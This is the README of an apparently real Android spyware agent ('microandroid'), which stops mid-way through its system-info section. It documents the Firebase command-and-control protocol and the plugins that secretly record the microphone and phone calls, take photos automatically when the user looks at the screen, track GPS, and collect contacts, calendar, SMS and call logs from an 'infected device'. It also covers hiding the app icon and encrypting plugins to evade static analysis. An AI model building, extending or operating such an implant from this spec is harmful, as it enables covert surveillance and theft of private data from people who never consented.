- [android micro-agent](#android-micro-agent)
  - [overview](#overview)
    - [base knowledge](#base-knowledge)
      - [interaction with the backend/console](#interaction-with-the-backendconsole)
      - [build options](#build-options)
      - [further information and build internals](#further-information-and-build-internals)
  - [internals](#internals)
    - [agent global configuration](#agent-global-configuration)
    - [agent messages (evidences/commands)](#agent-messages-evidencescommands)
      - [encryption/compression](#encryptioncompression)
      - [generic commands (from server to agent)](#generic-commands-from-server-to-agent)
        - [enable](#enable)
        - [start](#start)
        - [stop](#stop)
        - [core specific commands](#core-specific-commands)
          - [config](#config)
          - [hide](#hide)
          - [ping](#ping)
          - [uninstall](#uninstall)
        - [command batches](#command-batches)
    - [plugins](#plugins)
      - [notes on filters](#notes-on-filters)
      - [available plugins](#available-plugins)
        - [modmic](#modmic)
          - [commands](#commands)
          - [evidences](#evidences)
        - [modgsmcall](#modgsmcall)
          - [global configuration](#global-configuration)
          - [commands](#commands-1)
          - [evidences](#evidences-1)
        - [modcontacts](#modcontacts)
          - [commands](#commands-2)
          - [evidences](#evidences-2)
        - [modcalendar](#modcalendar)
          - [commands](#commands-3)
          - [evidences](#evidences-3)
        - [modcamera](#modcamera)
          - [global configuration](#global-configuration-1)
          - [commands](#commands-4)
          - [evidences](#evidences-4)
        - [modgps](#modgps)
          - [global configuration](#global-configuration-2)
          - [commands](#commands-5)
          - [evidences](#evidences-5)
        - [modcalllog](#modcalllog)
          - [global configuration](#global-configuration-3)
          - [commands](#commands-6)
          - [evidences](#evidences-6)
        - [modsms](#modsms)
          - [global configuration](#global-configuration-4)
          - [commands](#commands-7)
          - [evidences](#evidences-7)
        - [modinfo](#modinfo)
          - [evidences](#evidences-8)
        - [modmedia](#modmedia)
          - [global configuration](#global-configuration-5)
          - [commands](#commands-8)
          - [evidences](#evidences-9)
        - [modupdate](#modupdate)
          - [commands](#commands-9)
        - [modvoip](#modvoip)
          - [limitations](#limitations)
          - [global configuration](#global-configuration-6)
          - [commands](#commands-10)
          - [evidences](#evidences-10)
      - [special plugins](#special-plugins)
        - [modfirebasecmd](#modfirebasecmd)
          - [global configuration](#global-configuration-7)
        - [modevidence](#modevidence)
          - [global configuration](#global-configuration-8)
        - [modexfiltrate](#modexfiltrate)
          - [global configuration](#global-configuration-9)
    - [testing](#testing)
      - [cloud setup for testing (google account)](#cloud-setup-for-testing-google-account)
        - [firebase project](#firebase-project)
        - [firebase test scripts](#firebase-test-scripts)
      - [testing with DOZE mode](#testing-with-doze-mode)
      - [quick uninstall during testing](#quick-uninstall-during-testing)
    - [TODO](#todo)
      - [all](#all)
      - [backend](#backend)
      - [plugins](#plugins-1)
    - [issues](#issues)
# android micro-agent

code: J.R. Fumagalli, HT, y2k18

## overview

microandroid is a modular android agent extensible with plugins.

* it consists of a main __core__ APK which only contains code to manage __plugins__, everything else including *packaging evidences, exfiltrating evidences and receiving commands* is in a separate __plugin__ which may or may not be present.
* the architecture is completely modular, each plugin is a separate APK loaded by core in its address space at runtime and contains the necessary code to perform its task only (i.e. the __modmic__ plugin contains audio code to capture data from microphone, but do not contains code to handle the camera, or the device contacts).
* __even though some kind of plugins (i.e. to package evidences) is 'mandatory' in an agent, there is no concept of mandatory plugin at all in microandroid :)__

### base knowledge

#### interaction with the backend/console

The project actually uses Firebase real time messaging and real time database apis through the __modcmdfirebase__ plugin.

* When first deployed, it will contact the _firebase server_ and shows itself inside the _presence DB_.
* The _presence DB_ is constantly polled by the _backend_ to manage both new and already registered agents.
  * The _presence DB_ is used to communicate the clients specific token, which is necessary for sending messages to a specific agent.
* Once identified by the _backend_, the _agent_ will appear on the _console UI_ as a __liveagent instance__.
* From now on, the _console UI_ will be able to remotely control the _agent_ via commands (implemented as _firebase messages_), to both re/configure the agent and provide operational functionalities (i.e. retrieve data from the infected device).
* Collected evidences are delivered to the _backend_ using the traditional _RCS synch protocol_.

#### build options

Thanks to its modularity, the agent can be build with:

* Static with embedded plugins
* Static with upgradable embedded plugins
* In dynamic mode (_no embedded plugins_)

In all the building options all the embedded plugins (if any), __but the remotecmd plugin (modcmdfirebase)__, are ciphered with an AES key unavailable to the _agent_ until it is identified by the _backend_.

1. Once identification is done, a first __config__ command with the key is sent.
2. The plugins deciphered and re-encrypted  with a device specific key. 
3. Finally a _session_ key is generated and sent to the _backend_ for encrypting all the future messages shipped to the agent via firebase.

__This mechanism protect the agent and its payload from a static analysis__.

#### further information and build internals

[How to build and customize](./BUILD.md)

## internals

### agent global configuration

* each agent is provided with a configuration embedded at __buildtime__, to tweak the runtime parameters, called the __global configuration__.
* this allows to reconfigure both __core__ and the __automatic/both__ plugins at runtime.

~~~js
  {
      "core": {
        ...
      }
  }
~~~

each plugin may have its own node in this configuration under the _plugin_ node.

* __allow_auto__ allows a plugin to work in both __on-demand__ and __automatic__ mode, if supported.

~~~js
  // sample configuration, refer to each plugin for specific information
  {
       "core": {
         // if specified, the agent application icon is hidden at startup (default is true)
          "hide_at_startup": true
       },
       // configuration specific for the included plugins
       "plugins": {
      	"modgsmcall": {
        		"quality": 0,
        		"incoming_on_ringing": true
      	},
           ...
       	"modcamera": {
       		"allow_auto": true,
        		"quality": 0,
        		"mode": 0,
          	"use_autofocus": true
        	},
           ...
  	}
  }
~~~

### agent messages (evidences/commands)

  the format is somewhat common to both evidence and commands.

~~~js
  {  
      //
      // this part is common to all evidences and commands
      //
      
      // string, the message type (commands have 'remotecmd' here)
      "type":"remotecmd",
      
  	// boolean, commands only. if true, no cmdresult is generated in case of success (to avoid cluttering backend with cmdresults). default is false (always generate a cmdresult)
      "skipresult": true,

      // long, on evidence is the evidence capture time in unix epoch MILLISECONDS. on command, its ignored 
      "timestamp": 1542884753570,
      
      // long, on evidence is the optional command id which triggered the evidence. on command, the command id
      "cmdid": 12345678,
      
      // 64bit long, on evidence is optional and is used to mantain context in multi-chunk evidences (i.e. mic). on commands, its ignored
      "context": 12345678,
          
     // command specific: optional, indicates the command must be executed after a delay of the specified seconds.      
      "delay": 5,
      
      //
      // message specific part, this is specific to the evidence/command type
      //
      "body":{
          // command specific: all commands have 'target', mandatory: this is the target plugin internal name (returned by plugin->name()).      
          "target": "mic",
          // command specific: all commands have 'cmd', mandatory. it can be 'start', 'stop', 'enable', 'uninstall', 'hide'     
          "cmd": "start",
          // base64 encoded content, to transmit binary data both on evidence and command (payloads)
          "b64": "base64 encoded data",
           ...
          // free structure, message dependent
           ...
          }
      }
  }
~~~

#### encryption/compression

__this is outdated and currently you must refer to the RCS format implemented in libusynch__

~~each message __to the agent__ (_command_) and __from the agent__ (_evidence_) is compressed with the __Deflate__ algorithm and encrypted with __AES-CTR__ using the key specified in the __global configuration__.~~

~~the blob exfiltrated/incoming over the network has the following layout:~~

~~~js
  // outdated, refer to the RCS format
  0.15    | 16 bytes random iv
  16..end | encrypted/compressed json
~~~

#### generic commands (from server to agent)

to receive commands, the agent needs a command handler plugin like __modcmdfirebase__ (which receives commands through __firebase__)

* with no such plugin equipped, nothing happens.... just, commands are not received.
  * should be mandatory to include such a plugin, anyway :)

all plugins supports the generic __start__, __stop__, __enable__ commands.

each command generates a __cmdresult__ evidence with the command result.

##### enable

enable/disable the plugin _on the fly_ (if disabed, the plugin is still installed but won't capture any data until re-enabled again).
  
the format is always the following:

~~~js
    {
        "type":"remotecmd",
        "cmdid": 12345678,
        "body":{
            "target": "modgsmcall",    
            "name": "enable",
             // set to true to enable or false to disable the plugin
            "enabled": true
        }
    }
~~~

##### start

will run the plugin, executing its duty as specified in the specific command options, and set the plugin in the __running__ state.

once the job is done, the plugin is automatically reset to the __idle__ (stopped) state.

##### stop

will stop the plugin (as soon as possible, terminating the running job) if it's in the __running__ state, and set it to the __idle__ state.

the format is always the following:

~~~js
    {
        "type":"remotecmd",
        "cmdid": 12345678,
        "body":{
            "target": "modmic",
            "name": "stop"
        }
    }
~~~

##### core specific commands

these commands are processed by __core__ itself.

###### config

to update the __global configuration__

~~~js
  {
      "type":"remotecmd",
      "cmdid": 12345678,
      "body":{
      		// ignored, processed by core anyway
          "target": "core",   
          "name": "config",
          // the new configuration, zlib-deflate compressed + base64 encoded
          "b64": "..."
      }
  }
~~~

###### hide

to hide/show the application icon into the dashboard. this is meant only for particular cases, since by default the agent application icon is hidden directly at startup (unless _core->hide_at_startup_ is set to false in the __global configuration__).
~~~js
  {
      "type":"remotecmd",
      "cmdid": 12345678,
      "body":{
      	// ignored, processed by core anyway
      	"target": "core",    
          "name": "hide",        
          // hidden status, true to hide, false to keep it visible
          "hidden": true
      }
  }
~~~

###### ping

is a *no-op* command, it's meant to be sent by the backend at regular intervals to grant the application foreground status for a while.

__this must be sent regularly during recording calls or mic, and generally also for the camera and gps automatic feature to work correctly on latest Androids__

~~~js
  {
      "type":"remotecmd",
      "cmdid": 12345678,
      "body":{
      	// ignored, processed by core anyway
      	"target": "core",    
          "name": "ping",        
          // setting true do not generate a CmdResult (ideal to send the ping periodically). instead, standard ping (wakeup = false) is meant to check oneshot if the agent is alive and will generate a CmdResult as usual.
          "wakeup": true
      }
  }
~~~

###### uninstall

to uninstall a plugin, or the whole agent.

__uninstalling the whole agent needs user confirmation !__

~~~js 
  {
      "type":"remotecmd",
      "cmdid": 12345678,
      "body":{
      	// name of the plugin to uninstall. if target == '*', the whole agent is uninstalled (needs user confirmation....)
          "target": "modmic",
          "name": "uninstall"
      }
  }
~~~

##### command batches

all the above commands are sent to the agent as *batch* of one or more commands:

~~~js
{
    // if true, all the commands in the cmds array are executed in the same thread, sequentially (one starts after the previous ends). either, each one runs in parallel in a separated thread
    "sequential": false, 
    
    // if true, and sequential is true, failure of one command in the sequence aborts the processing of the sequence. either (in case of parallel commands) this is ignored)
    "fail_at_first_fail": false, 
    
    // this is an example of a command array. in case of a single command, just put a node only and (of course) sequential and fail_at_first_fail are ignored
    "cmds": [
         {
            "type": "remotecmd",
 		    "cmdid": 12345678,
 		    "timestamp": 1542884753570,
 		    "body": {
 		        "target": "core",
 		        "name": "ping",
				"wakeup": false
 		    }
 		 },
         {
            "type": "remotecmd",
 		    "cmdid": 12345679,
 		    "delay": 5,
 		    "timestamp": 1542884753571,
 		    "body": {
 		        "target": "modmic",
 		        "name": "start",
 		        "quality":1,
 		        "chunksize":10
 		    }
 		 }
	]
}
~~~

### plugins

* __on-demand__
  *  can be started and stopped on-demand via _start_ and _stop_ commands (they're not running always) (i.e. _modmic_).
* __automatic__ 
  * starts with the agent, they're costantly running (unless disabled) and responds to device events (i.e. _modgsmcall_, triggered by phone calls).
  * may have their own node in the __global__ configuration.
* __both__
  * able to work in both modes (i.e. _modcamera_, _modgps_).
  * may have their own node in the __global__ configuration, with the __allow_auto__ flag turned on.

#### notes on filters

Some plugins (as __modmedia__) allows to define a filter to specify the subset of data to be retrieved from a database knowing the database layout (i.e. to retrieve all data in a time range of 2 dates filtering by column *datetime*).

Filter format is as follows:

~~~js
{
 // filter node is optional, if not present all data is retrieved depending on the database query issued by the caller.
 // the filter node subnodes are each optional, and the filter matches if all of its subnodes matches according to their defined options (match_type, value, value_type)
 "filter": {
 	// this is the filter name. it's the caller duty to map this onto an existing database column
    "datetime_start": {
        // this is the value which, if matched, triggers the subnode match. note that this must be a string or a number, according to the "value_type" option below.
        "value": 12345678,
        
        // this is the type of the "value" above, which may be a string (0) or number (1)
        "value_type": 1,
        
        // this is the type of match for "value". currently defined are:
        // 0 = exact match
        // 1 = partial match (valid for string only, substring match)
        // 2 = greater than equal (matches with >=, valid for number only, i.e. a date)
        // 3 = less than equal (matches with <, valid for number only,  i.e. a date)
        // 4 = ignore (this subnode always matches, every option is ignored)
        "match_type": 2
    }
  },
  // futher optional subnodes .....
  "datetime_end": {
      ...
  },
  "name": {
        "value": "pippo",
        
        // string
        "value_type": 0,
        
      	// just a substring match is ok
        "match_type": 1
    },      
  ...
}
~~~

#### available plugins

all the available plugins and their supported commands and evidences.

##### modmic

captures microphone audio on-demand.

###### commands

* type: __on-demand__
* start
  
~~~js
  {
      "type":"remotecmd",
      "cmdid": 12345678,
      "body":{
          "target": "modmic",
  
          "name": "start",
          
          // the chunk size in seconds, minimum is 10
  		"chunksize": 30,
          
          // 0=low, 1=hi
          "quality": 0,
  
          // unix epoch MILLISECONDS datetime to stop the recording, if not present the recording will be stopped on reception of the stop command
          duetime: 1542884753570
      }
  }
~~~

* enable
* stop

###### evidences

* mic_audio

~~~js
  {
      "type":"mic_audio",
      "timestamp":1542884753570,
      "cmdid": 12345678,
      "context": 12345678,
      "body":{
          // offset in seconds for this chunk in chunksize-seconds steps (assuming a chunksize of 30 seconds, first is 0, 2nd is 30, 3rd is 60, ...)
          "offset_seconds": 0,
  
          // 0-based chunk index
          "chunk": 0,
  
          // the encoded audio payload for this chunk
          "b64": "base64 encoded blob"
  
          // if present, indicates this is the last chunk of the recording
          "last": false
      }
  }
~~~

##### modgsmcall

captures incoming/outgoing phone-call (__not voip__) audio, with caller/target information if available.

__NOTE: depending on device/OS, the other party voice may be recorded only through microphone__

* type: __automatic__, triggered by incoming/outgoing calls.

###### global configuration

the __global configuration__ may have an entry for this plugin.

~~~js
"modgsmcall": {
	// 0=low, 1=hi
    "quality": 0,
	// for incoming calls only: true to start recording on ringing, false to start recording only when answered
    "incoming_on_ringing": true,
    // the chunk size in seconds, minimum is 10
	"chunksize": 30
}
~~~

###### commands

* enable
* stop

###### evidences

* phone_call_audio

~~~js
  {
      "type":"phone_call_audio",
      "timestamp":1542884753570,
      "cmdid": 12345678,
      "context": 12345678,
      "body":{
   		// offset in seconds for this chunk in chunksize-seconds steps (assuming a chunksize of 30 seconds, first is 0, 2nd is 30, 3rd is 60, ...)
          "offset_seconds": 0,
          
          // 0-based chunk index
          "chunk": 0,
  
          // the encoded audio payload for this chunk
          "b64": "base64 encoded blob",
  
          // if present, indicates this is the last chunk of the recording
          "last": false,
  
          // call information
          "call_info": {
            // call direction, 1=incoming, 2=outgoing
            "direction": 1,
    
            // call start timestamp, unix epoch MILLISECONDS
            "start_timestamp":1542884753570,
    
            // the phone number (caller in case of incoming, called in case of outgoing)
            "phonenumber": 12345678,
    
            // the contact from the phonebook, if it's available        
            "contact": "TheContactName"          
          }
      }
  }
~~~

##### modcontacts

captures phonebook contacts.

* type: __on-demand__

###### commands

* enable
* start

~~~js
  {
      "type": "remotecmd",
      "cmdid": 12345678,
      "body": {
          "target": "modcontacts",
          "name": "start",
          "filter": {
              // this is a filter to control the returned values (refer to the "notes on filters" paragraph above)
  			// following is the list of supported entries, match_type and value_type for this specific filter            
              "name": {
                  "value": "TheContactName",
                  //  0|1|4 (exact/partial match/ignore)
                  "match_type": 0,
                  // 0: string
                  "value_type": 0
              },
              "email": {
                  "value": "bla@bla.com",
                  //  0|1|4 (exact/partial match/ignore)
                  "match_type": 0,
                  // 0: string
                  "value_type": 0
              },
              "website": {
                  "value": "http://bla.bla.com",
                  //  0|1|4 (exact/partial match/ignore)
                  "match_type": 0,
                  // 0: string
                  "value_type": 0
              },
              "phone": {
                  "value": "328 2122234",
                  //  0|1|4 (exact/partial match/ignore)
                  "match_type": 0,
                  // 0: string
                  "value_type": 0
              },
              "postal": {
                  "value": "22, acacia avenue",
                  //  0|1|4 (exact/partial match/ignore)
                  "match_type": 0,
                  // 0: string
                  "value_type": 0
              },
              "im": {
                  "value": "MyImAccount",
                  //  0|1|4 (exact/partial match/ignore)
                  "match_type": 0,
                  // 0: string
                  "value_type": 0
              },
              "company": {
                  "value": "MyCompany",
                  //  0|1|4 (exact/partial match/ignore)
                  "match_type": 0,
                  // 0: string
                  "value_type": 0
              }
          }
      }
  }
~~~

###### evidences

* contacts

~~~js
  {
      "type":"contacts",
      "timestamp":1542884753570,
      "cmdid": 12345678,
      "context": 12345678,
      "body":{
          // 0-based chunk index
          "chunk": 0,
  
      	// base64 encoded contacts json, each chunk contains max 100 entries dumped in A-Z order
      	"b64": "base64 encoded blob",
  
          // if present, indicates this is the last chunk
          "last": false
    }
  }
~~~

~~~js
      // this is the content of the encoded blob in the 'b64' field in the main json
       "Contact 1": {
            "email": [
              {
                "address": "mygmail@gmail.com",
                "type": "Altri"
              },
              {
                "address": "mymail@bla.com",
                "type": "Casa"
              },
              {
                "address": "mymail@bla.com",
                "type": "Bla Bla Custom"
              }
            ],
            "website": [
              {
                "url": "www.mysite.com"
              }
            ],
            "phone": [
              {
                "number": "333 111 2222",
                "type": "Cellulare"
              }
            ],
            "postal": [
              {
                "address": "Acacia Avenue, 22\nMilano, It 5234\nItalia",
                "type": "Ufficio"
              }
            ],
            "im": [
              {
                "address": "myhangout@gmail.com",
                "type": "Hangouts"
              },
              {
                "address": "myskype@outlook.it",
                "type": "Skype"
              }
            ],
            "company": {
              "name": "Megaditta",
              "title": "Geometra",
              "location": "1st floor",
              "department": "Ufficio Sinistri",
            }
        },
        "Contact 2": {
        	...
        }
~~~

##### modcalendar

captures calendar events.

* type: __on-demand__

###### commands

* enable
* start

~~~js
  {
  	"type": "remotecmd",
  	"cmdid": 12345678,
  	"body": {
  		"target": "modcalendar",
  		"name": "start",
  		"filter": {
  			// this is a filter to control the returned values (refer to the "notes on filters" paragraph above)
  			// following is the list of supported entries, match_type and value_type for this specific filter
  			"name": {
  				// the event name
  				"value": "TheEventName",
  				//  0|1|4 (exact/partial match/ignore)
  				"match_type": 0,
  				// 0: string
  				"value_type": 0
  			},
  			"datetime_start": {
  				// unix epoch MILLISECONDS datetime of the start of an interval with datetime_end, or exact time
  				"value": 1542884753570,
  				//  0|2|3|4 (exact/>=/<=/ignore)
  				"match_type": 0,
  				// 1: number
  				"value_type": 1
  			},
  			"datetime_end": {
  				// // unix epoch MILLISECONDS, this is intended as the end of an interval (all entries between datetime_start and datetime_end)
  				"value": 1542884793570,
  				//  3|4 (<=/ignore)
  				"match_type": 3,
  				// 1: number
  				"value_type": 1
  			},
  			"location": {
  				// the event location
  				"value": "MyPlace",
  				//  0|1|4 (exact/partial match/ignore)
  				"match_type": 0,
  				// 0: string
  				"value_type": 0
  			},
  			"attendees": {
  				// a csv string (or a single value) with names and email addresses
  				"value": "pippo,pluto,paperino",
  				//  1|4 (partial, matches if one of the values in the csv matches/ignore)
  				"match_type": 1,
  				// 0: string
  				"value_type": 0
  			}
  		}
  	}
  } 
~~~

###### evidences

* contacts

~~~js
  {
      "type":"contacts",
      "timestamp":1542884753570,
      "cmdid": 12345678,
      "context": 12345678,
      "body":{
          // 0-based chunk index
          "chunk": 0,
  
      	// base64 encoded contacts json, each chunk contains max 100 entries dumped in A-Z order
      	"b64": "base64 encoded blob",
  
          // if present, indicates this is the last chunk
          "last": false
    }
  }
~~~

~~~js
      // this is the content of the encoded blob in the 'b64' field in the main json
       "Contact 1": {
            "email": [
              {
                "address": "mygmail@gmail.com",
                "type": "Altri"
              },
              {
                "address": "mymail@bla.com",
                "type": "Casa"
              },
              {
                "address": "mymail@bla.com",
                "type": "Bla Bla Custom"
              }
            ],
            "website": [
              {
                "url": "www.mysite.com"
              }
            ],
            "phone": [
              {
                "number": "333 111 2222",
                "type": "Cellulare"
              }
            ],
            "postal": [
              {
                "address": "Acacia Avenue, 22\nMilano, It 5234\nItalia",
                "type": "Ufficio"
              }
            ],
            "im": [
              {
                "address": "myhangout@gmail.com",
                "type": "Hangouts"
              },
              {
                "address": "myskype@outlook.it",
                "type": "Skype"
              }
            ],
            "company": {
              "name": "Megaditta",
              "title": "Geometra",
              "location": "1st floor",
              "department": "Ufficio Sinistri",
            }
        },
        "Contact 2": {
        	...
        }
~~~

##### modcamera

takes pictures with the device camera/s.

* type: __both__

the plugins works as normal in __on-demand__ mode by taking pictures through the __start__ command.

As a plus, it has a node in the __global configuration__ where the automatic mode can be enabled by setting __allow_auto__.

If it is set, the plugin tries to determine through the accelerometer when the devices changes orientation from still (i.e. on a table) to vertical and tilted, a movement which is usually done when looking at the device screen right after having switched on the screen (i.e. to unlock the screen and use the device). 

If the plugin detects such behaviour, it automatically shoots photos according to the settings in __global configuration__.  

###### global configuration

the __global configuration__ may have an entry for this plugin.

~~~js
"modcamera": {
    // allow working independently (not only via command), by determining if the user is looking at the screen
    "allow_auto": true,
    // 0=low, 1=hi
    "quality": 0,
    // 0=both,1=front,2=back
    "mode": 0,
    // force use autofocus if available
    "use_autofocus": true
}
~~~

###### commands

* start    

~~~js
  {
      "type":"remotecmd",
      "cmdid": 12345678,
      "body":{
          "target": "modcamera",
          "name": "start",
       	// 0=low, 1=hi
        	"quality": 0,      	
        	// 0=both,1=front,2=back
        	"mode": 0,
          // force use autofocus if available
          "use_autofocus": true
      }
  }
~~~

* enable

###### evidences

* cam_snapshot

~~~js
  {
      "type":"cam_snapshot",
      "timestamp":1542884753570,
      "cmdid": 12345678,
      "context": 12345678,
      "body":{
      	// camera direction, 1=front, 2=back
      	"direction": 1,
          // the capture index, 0 if a single capture is requested(front or back) or 0=front,1=back if both is requested
          "idx": 0,
          // the captured image
          "b64": "base64 encoded blob"
      }
  }
~~~

##### modgps

report location acquired by GPS and other sensors (wifi, phone cell, ... ) leveraging *Google location services*. 

* type: __both__

the plugins works as normal in __on-demand__ mode by capturing the location through the __start__ command.

As a plus, it has a node in the __global configuration__ where the automatic mode can be enabled by setting __allow_auto__.

If it is set, the plugin starts on device boot and captures the location according to the settings in __global configuration__.

When the automatic mode is enabled, sending __start__ commands is not supported. 

To switch to __on-demand__ mode again, just send a new configuration through the __config__ command, with __allow_auto__ disabled.  

###### global configuration

the __global configuration__ may have an entry for this plugin.

~~~js
"modgps": {
    // allows working independently. if true, commands are not supported (to work via commands, upload a new configuration with allow_auto disabled)
    "allow_auto": true,
    // interval in seconds between capturs (indicative, OS may change the frequency, values less than 5 minutes are more prone to be delayed on newer OSs)
    "interval": 60,
    // force using the passive provider (may be less precise, less battery drained).
    // the passive provider uses previously acquired location provided by other applications. 
    // depending if the user is an avid social user (or of other applications which costantly updates location in the background), this may be the better choice!
    "force_passive_provider": true
}
~~~

###### commands

* start    

~~~js
  {
      "type":"remotecmd",
      "cmdid": 12345678,
      "body":{
          "target": "modgps",
          "name": "start",
          // interval in seconds between captures (indicative, OS may change the frequency, values less than 10 minutes are more prone to be delayed on newer OSs)
          // use 0 for single capture
        	"interval": 600,
          // unix epoch MILLISECONDS datetime to stop the capturing, if not present the capturing will be stopped on reception of the stop command
          "duetime": 0,
          // force using the passive provider (may be less precise, less battery drained).
          // the passive provider uses previously acquired location provided by other applications. depending if the user is an avid social user (or of other applications which costantly updates location in the background), this may be the better choice!
          // beware that it needs at least one application to have acquired the location, or it will indefinitely wait for it to happen before completing the command.
          "force_passive_provider": true
      }
  }
~~~

* enable
* stop

###### evidences

* position

~~~js
   {
        "cmdid": 12345678,
        "type": "position",
        "timestamp": 1544137565702,
        "context": 2404756050640041511,
        "body": {
        	// the UTC time for this fix
          "utc_timestamp": 1544137565648,
          // time in nanoseconds since boot for this fix
          "fix_time_nanos": 1030960556000000,
          // latitude
          "lat": 43.4061579,
          // longitude
          "lon": 11.7932931,
          // horizontal accuracy
          "h_accuracy": 14.942000389099121
          
          // all the above are guaranteed, the following
          // are device/provider dependent:
            
          // altitude
          "alt": 12.3456789
          // bearing
          "bearing": 12.3456789,
          // speed
          "speed": 12.3456789
        }
      }
  }
~~~

##### modcalllog

captures the call log.

* type: __both__

The plugin works as normal in __on-demand__ mode by capturing the call log through the __start__ command.

As a plus, it has a node in the __global configuration__ where the automatic mode can be enabled by setting __allow_auto__.

If it is set, the plugin starts on device boot and captures call information on-the-fly as they are received/placed.

###### global configuration

the __global configuration__ may have an entry for this plugin.

~~~js
"modcalllog": {
    // logs also call_info evidences on-the-fly
    "allow_auto": true,
	// for incoming calls only: true to log the evidence on ringing, false to log only when answered
    "incoming_on_ringing": true    
}
~~~

###### commands

* enable
* start

~~~js
  {
      "type": "remotecmd",
      "cmdid": 12345678,
      "body": {
          "target": "modcalllog",
          "name": "start",
          "filter": {
            	// this is a filter to control the returned values (refer to the "notes on filters" paragraph above)
  			// following is the list of supported entries, match_type and value_type for this specific filter            
              "name": {
                  "value": "TheContactName",
                  //  0|1|4 (exact/partial match/ignore)
                  "match_type": 0,
                  // 0: string
                  "value_type": 0
              },
              "number": {
                  "value": "bla@bla.com",
                  //  0|1|4 (exact/partial match/ignore)
                  "match_type": 0,
                  // 0: string
                  "value_type": 0
              },
              "type": {
                  // 1=incoming, 2=outgoing, 3=missed, 4=voicemail, 5=rejected, 6=blocked, 
                  "value": 0,
                  //  0|4 (exact/ignore)
                  "match_type": 0,
                  // 1: number
                  "value_type": 1
              },
  			"datetime_start": {
  				// unix epoch MILLISECONDS datetime of the call start
  				"value": 1542884753570,
  				//  0|2|3|4 (exact/>=/<=/ignore)
  				"match_type": 0,
  				// 1: number
  				"value_type": 1
  			},
  			"datetime_end": {
              // this is intended as the end of an interval (all entries between datetime_start and datetime_end)
  				"value": 1542884793570,
  				//  3|4 (<=/ignore)
  				"match_type": 3,
  				// 1: number
  				"value_type": 1
  			},
  			"duration": {
  				// call duration in seconds
  				"value": 60,
  				//  0|2|3|4 (exact/>=/<=/ignore)
  				"match_type": 0,
  				// 1: number
  				"value_type": 1
  			}
          }
      }
  }
~~~

###### evidences

* call_log

~~~js
  {
      "type":"call_log",
      "timestamp":1542884753570,
      "cmdid": 12345678,
      "context": 12345678,
      "body":{
          // 0-based chunk index
          "chunk": 0,
  
      	// base64 encoded contacts json, each chunk contains max 100 entries dumped in A-Z order
      	"b64": "base64 encoded blob",
  
          // if present, indicates this is the last chunk
          "last": false
    }
  }
~~~

~~~js
      // this is the content of the encoded blob in the 'b64' field in the main json
    {
    	"calls": [{
    			"name": "Mio Personale",
    			"number": "+39123412345",
    			"duration": 38,
    			"type": 1,
    			"start_timestamp": 1544004325529
    		},
    		{
    			"name": "Bababa",
    			"number": "+39334442132",
    			"duration": 0,
    			"type": 2,
    			"start_timestamp": 1543922455714
    		},
            ...
    	]
    }
~~~

* call_info

~~~js
  {
      "type":"call_info",
      "timestamp":1542884753570,
      "cmdid": 12345678,
      "context": 12345678,
      "body":{
  			"contact": "Mio Personale",
  			"phonenumber": "+39123412345",
  			"direction": 1
    	}
  }
~~~

##### modsms

captures SMS messages log and on-the-fly.

* type: __both__

The plugin works as normal in __on-demand__ mode by capturing the SMS log through the __start__ command.

As a plus, it has a node in the __global configuration__ where the automatic mode can be enabled by setting __allow_auto__.

If it is set, the plugin starts on device boot and captures SMS on-the-fly as they are received/sent.

###### global configuration

the __global configuration__ may have an entry for this plugin.

~~~js
"modsms": {
    // logs also single sms evidences on-the-fly
    "allow_auto": true
}
~~~

###### commands

* enable
* start

~~~js
  {
      "type": "remotecmd",
      "cmdid": 12345678,
      "body": {
          "target": "modsms",
          "name": "start",
          "filter": {
              // this is a filter to control the returned values (refer to the "notes on filters" paragraph above)
  			// following is the list of supported entries, match_type and value_type for this specific filter            
              "from": {
                  "value": "FromNumber",
                  //  0|1|4 (exact/partial match/ignore)
                  "match_type": 0,
                  // 0: string
                  "value_type": 0
              },
              "body": {
                  "value": "SomeText",
                  //  0|1|4 (exact/partial match/ignore)
                  "match_type": 0,
                  // 0: string
                  "value_type": 0
              },
              "type": {
                  // 1=incoming, 2=sent, 3=draft 
                  "value": 1,
                  //  0|4 (exact/ignore)
                  "match_type": 4,
                  // 1: number
                  "value_type": 1
              },
  			"datetime": {
  				// unix epoch MILLISECONDS datetime (timestamp sent/received)
  				"value": 1542884753570,
  				//  0|2|3|4 (exact/>=/<=/ignore)
  				"match_type": 0,
  				// 1: number
  				"value_type": 1
  			},
  			"datetime_end": {
              // this is intended as the end of an interval (all entries between datetime and datetime_end)
  				"value": 1542884793570,
  				//  3|4 (<=/ignore)
  				"match_type": 3,
  				// 1: number
  				"value_type": 1
  			}
          }
      }
  }
~~~

###### evidences

* sms_log

~~~js
  {
      "type":"sms_log",
      "timestamp":1542884753570,
      "cmdid": 12345678,
      "context": 12345678,
      "body":{
          // 0-based chunk index
          "chunk": 0,
  
      	// base64 encoded contacts json, each chunk contains max 100 entries dumped in A-Z order
      	"b64": "base64 encoded blob",
  
          // if present, indicates this is the last chunk
          "last": false
    }
  }
~~~

~~~js
      // this is the content of the encoded blob in the 'b64' field in the main json
    {
    	"smses": [{
     			"from": "blablabla",
          		"date_sent": 1540906617000,
          		"date_received": 1540906622008,
          		"body": "yauuuuuuuuuuuuuulla",
          		"type": 1
        	},
    		{
     			"from": "me",
          		"date_sent": 1540906617000,
          		"body": "uuuuuuuuuuuu",
          		"type": 2
    		},
            ...
    	]
    }
~~~

* sms

~~~js
  {
      "type":"sms",
      "timestamp":1542884753570,
      "cmdid": 12345678,
      "context": 12345678,
      "body":{
   			"from": "blablabla",
        		"date_sent": 1540906617000,
        		"date_received": 1540906622008,
        		"body": "yauuuuuuuuuuuuuulla",
        		"type": 1
    }
  }
~~~

##### modinfo

captures system information, including the installed applications.

* type: __on-demand__

###### commands

* enable
* start

~~~js
  {
      "type": "remotecmd",
      "cmdid": 12345678,
      "body": {
          "target": "modinfo",
          "name": "start",
          // limit applications to only the ones having a launch intent
          "only_visible_apps": true
      }
  }
~~~

###### evidences

* sysinfo

~~~js
     {
        "cmdid": 12345678,
        "type": "sysinfo",
        "timestamp": 1544626975793,
        "context": -2698764702890489359,
        "body": {
          "serial": "988a9c4132414b594730",
          "id": "R16NW",
          "manufacturer": "samsung",
          "brand": "samsung",
          "board": "universal8895",
          "hardware": "samsungexynos8895",
          "bootloader": "N950FXXS3CRF1",
          "radio": "N950FXXU3CRE1",
          "type": "user",
          "host": "SWDG9722",
          "fingerprint": "samsung\/greatltexx\/greatlte:8.0.0\/R16NW\/N950FXXS3CRF1:user\/release-keys",
          "version": "8.0.0",
          "security_patch": "2018-06-01",
          "incremental": "N950FXXS3CRF1",
          "sdk": 26,
          "has_root": false,
          "storage": {
